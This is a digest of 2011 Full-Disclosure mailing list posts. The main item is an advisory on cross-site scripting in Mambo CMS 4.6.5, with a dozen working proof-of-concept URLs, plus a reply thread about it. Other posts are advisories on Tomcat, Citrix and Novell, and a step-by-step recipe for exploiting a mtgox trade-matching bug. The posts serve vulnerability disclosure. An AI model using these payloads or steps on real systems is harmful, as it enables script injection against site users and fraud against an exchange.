[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's power in
simplicity also makes it the CMS of choice for many small businesses
and personal sites.
3. VULNERABILITY DESCRIPTION
Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.
4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)
5. PROOF-OF-CONCEPT/EXPLOIT
FrontEnd
==
param: task
http://attacker.in/mambo/index.php?option=com_contenttask=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20id=3Itemid=32
BackEnd
==
param: menu
http://attacker.in/mambo/administrator/index2.php?option=com_menumanagertask=edithidemainmenu=1menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20
param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox]
http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20style%3dx%3aexpression(alert(/XSS/))%20X
http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20X
param: zorder
http://attacker.in/mambo/administrator/index2.php?limit=10order%5b%5d=11boxchecked=0toggle=onsearch=simple_searchtask=limitstart=0cid%5b%5d=onzorder=c.ordering+DESC;scriptalert(/XSS/)/scriptfilter_authorid=62hidemainmenu=0option=com_typedcontent
param: search
http://attacker.in/mambo/administrator/index2.php?limit=10boxchecked=0toggle=onsearch=xss;scriptalert(/XSS/)/scripttask=limitstart=0hidemainmenu=0option=com_comment
param: client
http://attacker.in/mambo/administrator/index2.php?option=com_modulesclient=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on banner link
param: section [hidden form xss, esp in IE 6,7 and older versions of Firefox]
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3dx%3aexpression(alert(/XSS/))%20Xtask=editAhidemainmenu=1id=2
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20Xtask=editAhidemainmenu=1id=2
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2
http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2
6. SOLUTION
The vendor seems to discontinue the development. It is recommended to
use another CMS in active development.
7. VENDOR
Mambo CMS Development Team
http://mambo-developer.org
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip
#yehg [2011-06-27]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
On 27/06/2011 09:15, YGN Ethical Hacker Group wrote: Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities I thought these were found in Joomla ages ago? Did you really test a code base that is a version of an old Joomla base or did you look at the code, and test old Joomla bugs against it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-2204 - Apache Tomcat information disclosure
CVE-2011-2204 Apache Tomcat information disclosure Severity: Low Vendor: The Apache Software Foundation Versions Affected: - Tomcat 7.0.0 to 7.0.16 - Tomcat 6.0.0 to 6.0.32 - Tomcat 5.5.0 to 5.5.33 Earlier, unsupported versions may also be affected Description: When using the MemoryUserDatabase (based on tomcat-users.xml) and creating users via JMX, an exception during the user creation process may trigger an error message in the JMX client that includes the user's password. This error message is also written to the Tomcat logs. User passwords are visible to administrators with JMX access and/or administrators with read access to the tomcat-users.xml file. Users that do not have these permissions but are able to read log files may be able to discover a user's password. Steps to reproduce: The Tomcat security team has been unable to reproduce this error without forcing an exception by modifying the Tomcat source code. In theory, an OutOfMemoryError at exactly the right point could trigger this vulnerability. Mitigation: Users of affected versions should apply one of the following mitigations: - Don't manage the MemoryUserDatabase via JMX - Use digested passwords - Limit access to Tomcat log files - Upgrade to a Tomcat 7.0.17, 6.0.33 or 5.5.34 or later once released - Apply the appropriate patch - 7.0.x: http://svn.apache.org/viewvc?rev=1140070view=rev - 6.0.x: http://svn.apache.org/viewvc?rev=1140071view=rev - 5.5.x: http://svn.apache.org/viewvc?rev=1140072view=rev Credit: This issue was identified by Polina Genova and reported privately to the Tomcat Security Team via secur...@tomcat.apache.org. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-6.html http://tomcat.apache.org/security-5.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-226: Citrix EdgeSight Launcher Service Remote Code Execution Vulnerability
ZDI-11-226: Citrix EdgeSight Launcher Service Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-226 June 27, 2011 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Citrix -- Affected Products: Citrix EdgeSight -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11399. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Citrix EdgeSight. Authentication is not required to exploit this vulnerability. The flaw exists within the LauncherService.exe component which listens by default on TCP port 18747. When handling a request the process trusts a user supplied field in the packet specifying the length of data to follow, the process then copies the user supplied data, without validation, into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: Citrix has issued an update to correct this vulnerability. More details can be found at: http://support.citrix.com/article/CTX129699 -- Disclosure Timeline: 2011-01-21 - Vulnerability reported to vendor 2011-06-27 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * AbdulAziz Hariri -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-227: Novell File Reporter Engine RECORD Tag Parsing Remote Code Execution Vulnerability
ZDI-11-227: Novell File Reporter Engine RECORD Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-227 June 27, 2011 -- CVE ID: CVE-2011-2220 -- CVSS: 9.7, (AV:N/AC:L/Au:N/C:C/I:C/A:P) -- Affected Vendors: Novell -- Affected Products: Novell File Reporter -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 11279. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell File Reporter Engine. Authentication is not required to exploit this vulnerability. The specific flaw exists within NFREngine.exe which communicates with the Agent component over HTTPS on TCP port 3035. When parsing tags inside the RECORD element, the application lacks a size check before pushing strings to a memcpy. An attacker can leverage this to corrupt the thread's stack. This vulnerability can result in remote code execution under the context of the SYSTEM account. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://download.novell.com/Download?buildid=leLxi7tQACs~ -- Disclosure Timeline: 2011-05-25 - Vulnerability reported to vendor 2011-06-27 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * gwslabs.com -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Live mtgox.com trade matching bug.
Step 1: Have USD available for spending on mtgox.com. Step 2: Put in a buy order large enough to drain your account. Low enough under the current trading price that it will not execute immediately. Step 3: Withdraw all USD funds. Step 4: Wait for market to fall enough to meet your order. Step 5: ...(self explanatory)... There's a bit of luck in being able to take advantage, obviously. I would suggest you take the site down asap until this is corrected or publicly show how this order will never execute: == Welcome username removed 0. ฿TC 424.44901 Buying 138468.901 0.01 Active 1384.69 06/26 15:27 cancel == I cannot guarantee this order will execute but from everything I've observed about the new trade matching code I have no reason to believe it will not. At the very least this could be used to influence market conditions if it is only a display bug. -- Doug Huff smime.p7s Description: S/MIME cryptographic signature PGP.sig Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
Did you really test a code base that is a version of an old Joomla base No or did you look at the code, and test old Joomla bugs against it? No The XSS results are from purely blackbox scan on Mambo 4.6.5. Joomla (Joomla! 1.0.0) was released on September 16, 2005. It was a re-branded release of Mambo 4.5.2.3 which, itself, was combined with other bug and moderate-level security fixes. From that statement, it can be assumed that the code bases of Mambo 4.5.2.4 and higher are different from those of Joomla! 1.1 and higher. As you can say so, we may sync old Joomla! 1.x bugs in Mambo 4.6.x. But it may be time-consuming to analyze the code changes and validity of bugs in each version of both CMS. https://secure.wikimedia.org/wikipedia/en/wiki/Joomla http://www.joomla.org/announcements/general-news/154-introducing-joomla-10.html I thought these were found in Joomla ages ago? No. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
